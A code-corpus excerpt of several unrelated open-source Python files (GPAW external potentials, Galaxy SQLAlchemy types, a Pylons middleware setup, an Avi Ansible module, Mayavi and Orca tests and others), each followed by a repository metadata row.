#contrib.jacommands.run_combinations(check_activity,[[0],[0.1],[-2.5,-2.0,-3.0],[1.6],[0.4],[-8.0,-5.0,-6.0],[-1.2,-1.3,-1.4],[2.0],[0.4],[0.1],[0.05],[0.0,0.02],[4.0]])
#contrib.jacommands.run_combinations(check_activity,[[0],[0.0],[0.0],[0.4,0.8],[0.1,0.2],[-8.0,-5.0,-6.0],[-1.2],[1.0,0.5],[0.6],[0.2],[0.05,0.1],[0.0,0.05],[1.0,2.0,3.0]])
#set_parameters(0,0.1,-2.5,0.4,0.1,-8.0,-1.2,0.5,0.6,0.2,0.05,0.05,3.0)
| ioam/svn-history | contrib/JanA/surround_model_design.py | Python | bsd-3-clause | 33,000 | [
"Gaussian"
] | f7dcc8699ef1f02cd1aad40988dc5d8a630f42433ded329c046aee3d5311885f |
# -*- coding: utf-8 -*-
"""
ORCA Open Remote Control Application
Copyright (C) 2013-2020 Carsten Thielepape
Please contact me by : http://www.orca-remote.org/
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
def RegisterSoundProvider():
""" Nothing to do (we use kivy core funtions fpr most platforms"""
pass
| thica/ORCA-Remote | src/ORCA/utils/Platform/generic/generic_RegisterSoundProvider.py | Python | gpl-3.0 | 966 | [
"ORCA"
] | 029286931b27d409f8875b9ee7d7c9b479db0dfff20872872e4218d62e15b789 |
from __future__ import generators
from pygr.leelabdb import *
import pygr.coordinator
def map_clusters(server,**kwargs):
"map clusters one by one"
hg17=BlastDB(ifile=server.open_resource('hg17','r')) # CONSTRUCT RESOURCE FOR US IF NEEDED
# LOAD DB SCHEMA
(clusters,exons,splices,genomic_seq,spliceGraph,alt5Graph,alt3Graph,mrna,protein,
clusterExons,clusterSplices)=getSpliceGraphFromDB(spliceCalcs['HUMAN_SPLICE'])
for cluster_id in server:
g=genomic_seq[cluster_id]
m=hg17.megablast(g,maxseq=1,minIdentity=98) # MASK, BLAST, READ INTO m
# SAVE ALIGNMENT m TO DATABASE TABLE test.mytable USING cursor
createTableFromRepr(m.repr_dict(),
'GENOME_ALIGNMENT.hg17_cluster_jan02',
clusters.cursor,
{'src_id':'varchar(12)','dest_id':'varchar(12)'})
yield cluster_id # WE MUST FUNCTION AS GENERATOR
def serve_clusters():
"serve up cluster_id one by one"
cursor=getUserCursor('HUMAN_SPLICE')
t=SQLTable('HUMAN_SPLICE.genomic_cluster_jan02',cursor)
for id in t:
yield id
if __name__=='__main__':
coordinator.start_client_or_server(map_clusters,serve_clusters,['hg17'],__file__)
| ctb/pygr | tests/oldtests/old/mapclusters3.py | Python | bsd-3-clause | 1,250 | [
"BLAST"
] | 251b13365140b653ba5d06bec421580aa333a9cd92f53f43af45cb5b07f72035 |
#!/usr/bin/python
"""Test of navigation to same page links."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
#sequence.append(WaitForDocLoad())
sequence.append(PauseAction(5000))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Control>Home"))
sequence.append(utils.AssertPresentationAction(
"1. Top of file",
["BRAILLE LINE: 'Contents h1'",
" VISIBLE: 'Contents h1', cursor=1",
"SPEECH OUTPUT: 'Contents heading level 1'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"2. Tab",
["BRAILLE LINE: 'First item'",
" VISIBLE: 'First item', cursor=1",
"BRAILLE LINE: 'First item'",
" VISIBLE: 'First item', cursor=1",
"SPEECH OUTPUT: 'First item link.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Tab"))
sequence.append(utils.AssertPresentationAction(
"3. Tab",
["BRAILLE LINE: 'Second item'",
" VISIBLE: 'Second item', cursor=1",
"BRAILLE LINE: 'Second item'",
" VISIBLE: 'Second item', cursor=1",
"SPEECH OUTPUT: 'Second item link.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Return"))
sequence.append(utils.AssertPresentationAction(
"4. Return",
["BRAILLE LINE: 'Second h2'",
" VISIBLE: 'Second h2', cursor=1",
"SPEECH OUTPUT: 'Second heading level 2'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
"5. Down",
["BRAILLE LINE: 'Orca are versatile and opportunistic predators. Some populations feed mostly on fish, and other populations hunt marine'",
" VISIBLE: 'Orca are versatile and opportuni', cursor=1",
"SPEECH OUTPUT: 'Orca are versatile and opportunistic predators. Some populations feed mostly on fish, and other populations hunt marine'"]))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
| GNOME/orca | test/keystrokes/firefox/line_nav_follow_same_page_link.py | Python | lgpl-2.1 | 2,088 | [
"ORCA"
] | 0e85631c96f15745f8d7028709b8f0b01b678337e9ae9ee271cad70a4f43cc00 |
# -*- coding: utf-8 -*-
import os
from click import Argument
from groundwork.patterns import GwCommandsPattern, GwRecipesPattern
class GwRecipesBuilder(GwCommandsPattern, GwRecipesPattern):
"""
Provides commands for listing and building recipes via command line interface.
Provided commands:
* recipe_list
* recipe_build
Provides also the recipe **gw_package**, which can be used to setup a groundwork related python package.
Content of the package:
* setup.py: Preconfigured and ready to use.
* groundwork package structure: Directories for applications, patterns, plugins and recipes.
* Simple, runnable example of a groundwork application and plugins.
* usable test, supported by py.test and tox.
* expandable documentation, supported by sphinx and the groundwork sphinx template.
* .gitignore
This code is hardly based on Cookiecutter's main.py file:
https://github.com/audreyr/cookiecutter/blob/master/cookiecutter/main.py
"""
def __init__(self, *args, **kwargs):
self.name = kwargs.get("name", self.__class__.__name__)
super(GwRecipesBuilder, self).__init__(*args, **kwargs)
def activate(self):
self.commands.register("recipe_list", "Lists all recipes", self._recipe_list)
self.commands.register("recipe_build", "Builds a given recipe", self._recipe_build,
params=[Argument(("recipe",), required=True)])
self.recipes.register("gw_package",
os.path.abspath(os.path.join(os.path.dirname(__file__), "../recipes/gw_package")),
description="Groundwork basic package. Includes places for "
"apps, plugins, patterns and recipes.",
final_words="Recipe Installation is done.\n\n"
"During development use buildout:\n"
"Run: python bootstrap.py\n"
"Then: bin/buildout\n"
"Start the app: bin/app\n\n"
"For installation run: 'python setup.py install' \n"
"For documentation run: 'make html' inside doc folder "
"(after installation!)\n\n"
"For more information, please take a look into the README file "
"to know how to go on.\n"
"For help visit: https://groundwork.readthedocs.io\n\n"
"Have fun with your groundwork package.")
def deactivate(self):
pass
def _recipe_list(self):
print("Recipes:")
for key, recipe in self.app.recipes.get().items():
print(" %s by plugin '%s' - %s" % (recipe.name, recipe.plugin.name, recipe.description))
def _recipe_build(self, recipe):
recipe_obj = self.app.recipes.get(recipe)
if recipe_obj is None:
print("Recipe %s not found." % recipe)
else:
recipe_obj.build(no_input=False, extra_context=None)
| useblocks/groundwork | groundwork/plugins/gw_recipes_builder.py | Python | mit | 3,282 | [
"VisIt"
] | 0047221d0bf48bad3cd49ef99d64a54109372613b98c8982c84b25ff1ac6b0a7 |
"""
Unit tests for basic CDL constructs.
"""
import os
import tempfile
import unittest
import cdlparser
import numpy as np
#---------------------------------------------------------------------------------------------------
class TestBasics(unittest.TestCase) :
#---------------------------------------------------------------------------------------------------
def setUp(self) :
cdltext = r"""netcdf basics {
dimensions:
lev = 1 ;
lat = 2 ;
lon = 3 ;
time = unlimited ;
variables:
int tas(lev, lat, lon) ;
tas:standard_name = "air_temperature" ;
tas:units = "K" ;
tas:radius = 6371000.0 ;
double height(lev) ;
height:standard_name = "height" ;
// global attributes
:Conventions = "CF-1.5" ;
:comment = "cdlparser rocks!" ;
data:
tas = 0, 1, 2, 3, 4, 5 ;
height = 10.0 ;
}"""
parser = cdlparser.CDL3Parser()
self.tmpfile = tempfile.mkstemp(suffix='.nc')[1]
self.dataset = parser.parse_text(cdltext, ncfile=self.tmpfile)
def tearDown(self) :
if os.path.exists(self.tmpfile) : os.remove(self.tmpfile)
def test_global_atts(self) :
self.assertTrue(self.dataset.Conventions == "CF-1.5")
self.assertTrue(self.dataset.comment == "cdlparser rocks!")
def test_dimensions(self) :
self.assertTrue(len(self.dataset.dimensions) == 4)
lev = self.dataset.dimensions['lev']
self.assertTrue(len(lev) == 1)
lat = self.dataset.dimensions['lat']
self.assertTrue(len(lat) == 2)
lon = self.dataset.dimensions['lon']
self.assertTrue(len(lon) == 3)
time = self.dataset.dimensions['time']
self.assertTrue(len(time) == 0)
self.assertTrue(time.isunlimited())
def test_variables(self) :
self.assertTrue(len(self.dataset.variables) == 2)
tas = self.dataset.variables['tas']
self.assertTrue(tas.standard_name == "air_temperature")
self.assertTrue(tas.units == "K")
self.assertTrue(tas.radius == np.float64(6371000.0))
data = tas[:]
self.assertTrue(data.shape == (1,2,3))
expected = np.arange(6, dtype=np.int32)
expected.shape = (1,2,3)
self.assertTrue(np.array_equal(data, expected))
ht = self.dataset.variables['height']
self.assertTrue(ht.standard_name == "height")
data = ht[:]
self.assertTrue(data.shape == (1,))
expected = np.array([10.0], dtype=np.float64)
expected.shape = (1,)
self.assertTrue(np.array_equal(data, expected))
#---------------------------------------------------------------------------------------------------
if __name__ == '__main__':
#---------------------------------------------------------------------------------------------------
unittest.main()
| ocehugo/cdlparser | test/test_basics.py | Python | bsd-3-clause | 2,901 | [
"NetCDF"
] | 16cc26fae77b858742665a1bf535e9b6314309c4b0dd4d98f72c132839824d8e |
import numpy as np
from ase.units import Bohr
"""This module defines different external potentials to be used in
time-independent and time-dependent calculations."""
class ExternalPotential:
""" External potential
"""
def __init__(self, vext_g=None, gd=None):
"""Initialize with a grid and the corresponding grid descriptor.
Grid values should be in Hartree.
"""
self.vext_g = vext_g
self.gd = gd
if self.gd is not None:
assert gd.orthogonal
if np.alltrue(vext_g.shape ==
gd.get_size_of_global_array()):
# this is a global array and has to be distributed
self.vext_g = self.gd.zeros()
self.gd.distribute(vext_g, self.vext_g)
def get_potential(self, gd=None):
if self.gd is None:
self.gd = gd
else:
if gd is not None:
# make sure we are talking about the same grid
assert gd == self.gd
return self.vext_g
def get_taylor(self, position=None, spos_c=None):
"""Get the Taylor expansion around a point
position [Angstrom]"""
# use only 0 order term, i.e. the value
return [[self.get_value(position, spos_c)]]
def get_value(self, position=None, spos_c=None):
"""The potential value (as seen by an electron)
at a certain grid point.
position [Angstrom]
spos_c scaled position on the grid"""
if spos_c is None:
spos_c = self.gd.scale_position(position / Bohr)
g_c = self.gd.get_nearest_grid_point(spos_c)
g_c -= (g_c == self.gd.n_c) # force point to this domain
return self.vext_g[tuple(g_c)]
def get_nuclear_energy(self, nucleus):
"""Return the energy contribution of the bare nucleus."""
return 0. # don't assume anything about the nucleus
def add_linear_field(self, wfs, spos_ac, a_nG, b_nG, strength, kpt):
"""Adds (does NOT apply) linear field
f(x,y,z) = str_x * x + str_y * y + str_z * z to wavefunctions.
Parameters
----------
pt_nuclei: List of ?LocalizedFunctions?
Projectors (paw.pt_nuclei)
a_nG:
the wavefunctions
b_nG:
the result
strength: float[3]
strength of the linear field
kpt: KPoint
K-point
"""
gd = wfs.gd
# apply local part of x to smooth wavefunctions psit_n
for i in range(gd.n_c[0]):
x = (i + gd.beg_c[0]) * gd.h_cv[0, 0]
b_nG[:,i,:,:] += (strength[0] * x) * a_nG[:,i,:,:]
# FIXME: combine y and z to one vectorized operation,
# i.e., make yz-array and take its product with a_nG
# apply local part of y to smooth wavefunctions psit_n
for i in range(gd.n_c[1]):
y = (i + gd.beg_c[1]) * gd.h_cv[1, 1]
b_nG[:,:,i,:] += (strength[1] * y) * a_nG[:,:,i,:]
# apply local part of z to smooth wavefunctions psit_n
for i in range(gd.n_c[2]):
z = (i + gd.beg_c[2]) * gd.h_cv[2, 2]
b_nG[:,:,:,i] += (strength[2] * z) * a_nG[:,:,:,i]
# apply the non-local part for each nucleus
# number of wavefunctions, psit_nG
n = len(a_nG)
P_ani = wfs.pt.dict(n)
wfs.pt.integrate(a_nG, P_ani, kpt.q)
coef_ani = {}
for a, P_ni in P_ani.items():
c0 = np.dot(spos_ac[a] * gd.cell_cv.diagonal(), strength)
cxyz = strength
# calculate coefficient
# ---------------------
#
# coeffs_ni =
# P_nj * c0 * 1_ij
# + P_nj * cx * x_ij
#
# where (see spherical_harmonics.py)
#
# 1_ij = sqrt(4pi) Delta_0ij
# y_ij = sqrt(4pi/3) Delta_1ij
# z_ij = sqrt(4pi/3) Delta_2ij
# x_ij = sqrt(4pi/3) Delta_3ij
# ...
Delta_iiL = wfs.setups[a].Delta_Lii # XXX rename in setup.py
# 1_ij = sqrt(4pi) Delta_0ij
# y_ij = sqrt(4pi/3) Delta_1ij
# z_ij = sqrt(4pi/3) Delta_2ij
# x_ij = sqrt(4pi/3) Delta_3ij
oneij = np.sqrt(4.*np.pi) \
* np.dot(P_ni, Delta_iiL[:,:,0])
yij = np.sqrt(4.*np.pi / 3.) \
* np.dot(P_ni, Delta_iiL[:,:,1])
zij = np.sqrt(4.*np.pi / 3.) \
* np.dot(P_ni, Delta_iiL[:,:,2])
xij = np.sqrt(4.*np.pi / 3.) \
* np.dot(P_ni, Delta_iiL[:,:,3])
# coefficients
# coefs_ni = sum_j ( <phi_i| f(x,y,z) | phi_j>
# - <phit_i| f(x,y,z) | phit_j> ) P_nj
coef_ani[a] = ( c0 * oneij
+ cxyz[0] * xij + cxyz[1] * yij + cxyz[2] * zij )
# add partial wave pt_nG to psit_nG with proper coefficient
wfs.pt.add(b_nG, coef_ani, kpt.q)
# BAD, VERY VERY SLOW, DO NOT USE IN REAL CALCULATIONS!!!
def apply_scalar_potential(self, pt_nuclei, a_nG, b_nG, func, kpt):
"""Apply scalar function f(x,y,z) to wavefunctions. BAD
NOTE: BAD, VERY VERY SLOW, DO NOT USE IN REAL CALCULATIONS!!!
The function is approximated by a low-order polynomial near nuclei.
Currently supports only quadratic (actually, only linear as
nucleus.apply_polynomial support only linear)::
p(x,y,z) = a + b_x x + b_y y + b_z z
+ c_x^2 x^2 + c_xy x y
+ c_y^2 y^2 + c_yz y z
+ c_z^2 z^2 + c_zx z x
The polynomial is constructed by making a least-squares fit to
points (0,0,0), 3/8 (r_cut,0,0), sqrt(3)/4 (r_cut,r_cut,r_cut), and
to points symmetric in cubic symmetry. (Points are given relative to
the nucleus).
"""
# apply local part to smooth wavefunctions psit_n
for i in range(kpt.gd.n_c[0]):
x = (i + kpt.gd.beg_c[0]) * kpt.gd.h_cv[0, 0]
for j in range(kpt.gd.n_c[1]):
y = (j + kpt.gd.beg_c[1]) * kpt.gd.h_cv[1, 1]
for k in range(kpt.gd.n_c[2]):
z = (k + kpt.gd.beg_c[2]) * kpt.gd.h_c[2, 2]
b_nG[:,i,j,k] = func.value(x,y,z) * a_nG[:,i,j,k]
# apply the non-local part for each nucleus
for nucleus in pt_nuclei:
if nucleus.in_this_domain:
# position
x_c = nucleus.spos_c[0] * kpt.gd.cell_cv[0, 0]
y_c = nucleus.spos_c[1] * kpt.gd.cell_cv[1, 1]
z_c = nucleus.spos_c[2] * kpt.gd.cell_cv[2, 2]
# Delta r = max(r_cut) / 2
# factor sqrt(1/3) because (dr,dr,dr)^2 = Delta r
rcut = max(nucleus.setup.rcut_j)
a = rcut * 3.0 / 8.0
b = 2.0 * a / np.sqrt(3.0)
# evaluate function at (0,0,0), 3/8 (r_cut,0,0),
# sqrt(3)/4 (r_cut,r_cut,rcut), and at symmetric points
# in cubic symmetry
#
# coordinates
coords = [ [x_c,y_c,z_c], \
[x_c+a, y_c, z_c], \
[x_c-a, y_c, z_c], \
[x_c, y_c+a, z_c], \
[x_c, y_c-a, z_c], \
[x_c, y_c, z_c+a], \
[x_c, y_c, z_c-a], \
[x_c+b, y_c+b, z_c+b], \
[x_c+b, y_c+b, z_c-b], \
[x_c+b, y_c-b, z_c+b], \
[x_c+b, y_c-b, z_c-b], \
[x_c-b, y_c+b, z_c+b], \
[x_c-b, y_c+b, z_c-b], \
[x_c-b, y_c-b, z_c+b], \
[x_c-b, y_c-b, z_c-b] ]
# values
values = np.zeros(len(coords))
for i in range(len(coords)):
values[i] = func.value( coords[i][0],
coords[i][1],
coords[i][2] )
# fit polynomial
# !!! FIX ME !!! order should be changed to 2 as soon as
# nucleus.apply_polynomial supports it
nuc_poly = Polynomial(values, coords, order=1)
#print nuc_poly.c
# apply polynomial operator
nucleus.apply_polynomial(a_nG, b_nG, self.k, nuc_poly)
# if not in this domain
else:
nucleus.apply_polynomial(a_nG, b_nG, self.k, None)
class ConstantPotential(ExternalPotential):
"""Constant potential for tests."""
def __init__(self, constant=1.):
self.constant = constant
ExternalPotential.__init__(self)
def get_potential(self, gd):
if self.vext_g is None:
self.gd = gd
self.vext_g = gd.zeros() + self.constant
return self.vext_g
def get_ion_energy_and_forces(self, atoms):
"""Return the ionic energy and force contribution."""
forces = np.zeros((len(atoms),3))
energy = 0
return energy, forces
class ElectrostaticPotential(ExternalPotential):
"""External electrostatic potential
The action of the external potential on the nucleus is defined in the
electrostatic case.
"""
def get_ion_energy_and_forces(self, atoms):
"""Return the ionic energy and force contribution."""
forces = np.zeros((len(atoms),3))
energy = 0
for i, atom in enumerate(atoms):
taylor = self.get_taylor(atom.position)
## print "pos, taylor=", atom.position, taylor
Z = atom.number
energy -= Z * taylor[0][0]
if len(taylor) > 1:
# see spherical_harmonics.py for the assignment
forces[i] += Z * np.array([taylor[1][2], # x
taylor[1][0], # y
taylor[1][1]])# z
return energy, forces
class ConstantElectricField(ElectrostaticPotential):
"""External constant electric field"""
def __init__(self, strength, direction=[0,0,1], center=None):
"""
strength: field strength [atomic units]
direction: polarisation direction
center: the center of zero field [Angstrom]
"""
self.strength = strength
if center is None:
self.center = None
else:
self.center = np.array(center) / Bohr
# normalise the direction
dir = np.array(direction)
dir /= np.sqrt(np.dot(dir, dir))
self.direction = dir
def get_potential(self, gd=None):
"""Get the potential on the grid."""
if hasattr(self, 'potential'):
if gd == self.gd or gd is None:
# nothing changed
return self.potential
self.gd = gd
if self.center is None:
# use the center of the grid as default
self.center = .5 * np.sum(gd.h_cv * gd.N_c, axis=0)
x = np.dot( ( (np.arange(gd.n_c[0]) + gd.beg_c[0]).reshape(-1, 1) *
gd.h_cv[0, :] - self.center ), self.direction )
y = np.dot( ( (np.arange(gd.n_c[1]) + gd.beg_c[1]).reshape(-1, 1) *
gd.h_cv[1, :] - self.center ), self.direction )
z = np.dot( ( (np.arange(gd.n_c[2]) + gd.beg_c[2]).reshape(-1, 1) *
gd.h_cv[2, :] - self.center ), self.direction )
x.shape = (-1,1,1)
y.shape = (1,-1,1)
z.shape = (1,1,-1)
self.potential = self.strength * ( np.resize(x, gd.n_c) +
np.resize(y, gd.n_c) +
np.resize(z, gd.n_c) )
return self.potential
def get_taylor(self, position=None, spos_c=None):
"""Get the Taylor expansion around a point
position [Angstrom]"""
if position is None:
gd = self.gd
pos = np.dot(gd.N_c*spos_c, gd.h_cv) * Bohr
else:
pos = position
# see spherical_harmonics.py for the assignment
return [[self.get_value(position=pos)],
[self.strength * self.direction[1], # y
self.strength * self.direction[2], # z
self.strength * self.direction[0]]]# x
def get_value(self, position=None, spos_c=None):
"""The potential value (as seen by an electron)
at a certain grid point.
position [Angstrom]
spos_c scaled position on the grid"""
gd = self.gd
if position is None:
vr = np.dot(gd.N_c*spos_c, gd.h_cv) - self.center
else:
vr = position / Bohr - self.center
return self.strength * np.dot(vr, self.direction)
| qsnake/gpaw | gpaw/external_potential.py | Python | gpl-3.0 | 13,131 | [
"ASE"
] | f887b35263eb4b4cb5f00887f242bb18067c40b9004955c3c70b5220d03a871e |
from sqlalchemy.types import *
import json
import pickle
import copy
import uuid
import binascii
from galaxy.util.bunch import Bunch
from galaxy.util.aliaspickler import AliasPickleModule
# For monkeypatching BIGINT
import sqlalchemy.dialects.sqlite
import sqlalchemy.dialects.postgresql
import sqlalchemy.dialects.mysql
import logging
log = logging.getLogger( __name__ )
# Default JSON encoder and decoder
json_encoder = json.JSONEncoder( sort_keys=True )
json_decoder = json.JSONDecoder( )
def _sniffnfix_pg9_hex(value):
"""
Sniff for and fix postgres 9 hex decoding issue
"""
try:
if value[0] == 'x':
return binascii.unhexlify(value[1:])
elif value.startswith( '\\x' ):
return binascii.unhexlify( value[2:] )
else:
return value
except Exception, ex:
return value
class JSONType( TypeDecorator ):
"""
Defines a JSONType for SQLAlchemy. Takes a primitive as input and
JSONifies it. This should replace PickleType throughout Galaxy.
"""
impl = LargeBinary
def process_bind_param( self, value, dialect ):
if value is None:
return None
return json_encoder.encode( value )
def process_result_value( self, value, dialect ):
if value is None:
return None
return json_decoder.decode( str( _sniffnfix_pg9_hex(value) ) )
def copy_value( self, value ):
# return json_decoder.decode( json_encoder.encode( value ) )
return copy.deepcopy( value )
def compare_values( self, x, y ):
# return json_encoder.encode( x ) == json_encoder.encode( y )
return ( x == y )
def is_mutable( self ):
return True
metadata_pickler = AliasPickleModule( {
( "cookbook.patterns", "Bunch" ) : ( "galaxy.util.bunch" , "Bunch" )
} )
class MetadataType( JSONType ):
"""
Backward compatible metadata type. Can read pickles or JSON, but always
writes in JSON.
"""
def process_result_value( self, value, dialect ):
if value is None:
return None
ret = None
try:
ret = metadata_pickler.loads( str( value ) )
if ret:
ret = dict( ret.__dict__ )
except:
try:
ret = json_decoder.decode( str( _sniffnfix_pg9_hex(value) ) )
except:
ret = None
return ret
class UUIDType(TypeDecorator):
"""
Platform-independent UUID type.
Based on http://docs.sqlalchemy.org/en/rel_0_8/core/types.html#backend-agnostic-guid-type
Changed to remove sqlalchemy 0.8 specific code
CHAR(32), storing as stringified hex values.
"""
impl = CHAR
def load_dialect_impl(self, dialect):
return dialect.type_descriptor(CHAR(32))
def process_bind_param(self, value, dialect):
if value is None:
return value
else:
if not isinstance(value, uuid.UUID):
return "%.32x" % uuid.UUID(value)
else:
# hexstring
return "%.32x" % value
def process_result_value(self, value, dialect):
if value is None:
return value
else:
return uuid.UUID(value)
class TrimmedString( TypeDecorator ):
impl = String
def process_bind_param( self, value, dialect ):
"""Automatically truncate string values"""
if self.impl.length and value is not None:
value = value[0:self.impl.length]
return value
#class BigInteger( Integer ):
#"""
#A type for bigger ``int`` integers.
#Typically generates a ``BIGINT`` in DDL, and otherwise acts like
#a normal :class:`Integer` on the Python side.
#"""
#class BIGINT( BigInteger ):
#"""The SQL BIGINT type."""
#class SLBigInteger( BigInteger ):
#def get_col_spec( self ):
#return "BIGINT"
#sqlalchemy.dialects.sqlite.SLBigInteger = SLBigInteger
#sqlalchemy.dialects.sqlite.colspecs[BigInteger] = SLBigInteger
#sqlalchemy.dialects.sqlite.ischema_names['BIGINT'] = SLBigInteger
#sqlalchemy.dialects.postgres.colspecs[BigInteger] = sqlalchemy.dialects.postgres.PGBigInteger
#sqlalchemy.dialects.mysql.colspecs[BigInteger] = sqlalchemy.dialects.mysql.MSBigInteger
| mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/model/custom_types.py | Python | gpl-3.0 | 4,279 | [
"Galaxy"
] | 4977ce6b363d3f14b6b3be7186cfafbc828be19c64b0adedb1936e4dea3e62dd |
"""Pylons middleware initialization"""
import types
from beaker.middleware import CacheMiddleware, SessionMiddleware
from routes.middleware import RoutesMiddleware
from paste.cascade import Cascade
from paste.registry import RegistryManager
from paste.urlparser import StaticURLParser
from paste.deploy.converters import asbool
from pylons import config
from pylons.error import error_template
from pylons.middleware import error_mapper, ErrorDocuments, ErrorHandler
from pylons.wsgiapp import PylonsApp
from dirac.config.environment import load_environment
def make_app( global_conf, full_stack = True, **app_conf ):
"""Create a Pylons WSGI application and return it
``global_conf``
The inherited configuration for this application. Normally from
the [DEFAULT] section of the Paste ini file.
``full_stack``
Whether or not this application provides a full WSGI stack (by
default, meaning it handles its own exceptions and errors).
Disable full_stack when this application is "managed" by
another WSGI middleware.
``app_conf``
The application's local configuration. Normally specified in the
[app:<name>] section of the Paste ini file (where <name>
defaults to main).
"""
# Configure the Pylons environment
load_environment( global_conf, app_conf )
# The Pylons WSGI app
# Overload with DIRAC app after the PYTHONPATH has been set
from dirac.lib.DiracWebApp import DiracWebApp
app = DiracWebApp()
# CUSTOM MIDDLEWARE HERE (filtered by error handling middlewares)
app = RoutesMiddleware( app, config['routes.map'] )
app = SessionMiddleware( app, config )
app = CacheMiddleware( app, config )
if asbool( full_stack ):
# Handle Python exceptions
app = ErrorHandler( app, global_conf, **config['pylons.errorware'] )
# Display error documents for 401, 403, 404 status codes (and
# 500 when debug is disabled)
app = ErrorDocuments( app, global_conf, mapper = error_mapper, **app_conf )
# Establish the Registry for this application
app = RegistryManager( app )
# Static files
staticFiles = config['pylons.paths']['static_files']
cascadeApps = []
if type( staticFiles ) in ( types.ListType, types.TupleType ):
for staticFile in staticFiles:
cascadeApps.append( StaticURLParser( staticFile ) )
else:
cascadeApps.append( StaticURLParser( staticFiles ) )
cascadeApps.extend( [ app ] )
app = Cascade( cascadeApps )
return app
| DIRACGrid/DIRACWeb | dirac/config/middleware.py | Python | gpl-3.0 | 2,564 | [
"DIRAC"
] | 2ea85ba099bc7803d0a3ac4a7f90bb4b3be5ec3dfc30cb92b464058f512e5542 |
#!/usr/bin/python
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_cloudconnectoruser
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of CloudConnectorUser Avi RESTful Object
description:
- This module is used to configure CloudConnectorUser object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
azure_serviceprincipal:
description:
- Field introduced in 17.2.1.
version_added: "2.5"
azure_userpass:
description:
- Field introduced in 17.2.1.
version_added: "2.5"
name:
description:
- Name of the object.
required: true
private_key:
description:
- Private_key of cloudconnectoruser.
public_key:
description:
- Public_key of cloudconnectoruser.
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Create a Cloud connector user that is used for integration into cloud platforms
avi_cloudconnectoruser:
controller: '{{ controller }}'
name: root
password: '{{ password }}'
private_key: |
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----'
public_key: 'ssh-rsa ...'
tenant_ref: admin
username: '{{ username }}'
"""
RETURN = '''
obj:
description: CloudConnectorUser (api/cloudconnectoruser) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
azure_serviceprincipal=dict(type='dict',),
azure_userpass=dict(type='dict',),
name=dict(type='str', required=True),
private_key=dict(type='str', no_log=True,),
public_key=dict(type='str',),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'cloudconnectoruser',
set(['private_key']))
if __name__ == '__main__':
main()
| alexlo03/ansible | lib/ansible/modules/network/avi/avi_cloudconnectoruser.py | Python | gpl-3.0 | 4,187 | [
"VisIt"
] | 7011fb21fd659ebf76eb8773fa4688a9e1d796e2e594d3aede2226716513f72d |
"""A Chaco file reader.
"""
# Author: Suyog Dutt Jain <suyog.jain@aero.iitb.ac.in>
# Copyright (c) 2009, Enthought, Inc.
# License: BSD Style.
# Enthought library imports.
from traits.api import Instance, Str
from traitsui.api import View, Group, Item
from tvtk.api import tvtk
# Local imports.
from mayavi.core.source import Source
from mayavi.core.pipeline_info import PipelineInfo
########################################################################
# `ChacoReader` class
########################################################################
class ChacoReader(Source):
"""A Chaco reader.
"""
# The version of this class. Used for persistence.
__version__ = 0
base_name = Str('', desc='basename of the Chaco files')
# The VTK data file reader.
reader = Instance(tvtk.ChacoReader, args=(), allow_none=False,
record=True)
# Information about what this object can produce.
output_info = PipelineInfo(datasets=['unstructured_grid'])
########################################
# View related code.
# Our view.
view = View(Group(Item(name='reader', style='custom',
resizable=True),
show_labels=False),
resizable=True)
######################################################################
# `FileDataSource` interface
######################################################################
def __init__(self, base_name='', configure=True, **traits):
super(ChacoReader, self).__init__(**traits)
if configure:
self.reader.edit_traits(kind='livemodal')
self.base_name = self.reader.base_name
def update(self):
if len(self.base_name) == 0:
return
self.reader.update()
self.render()
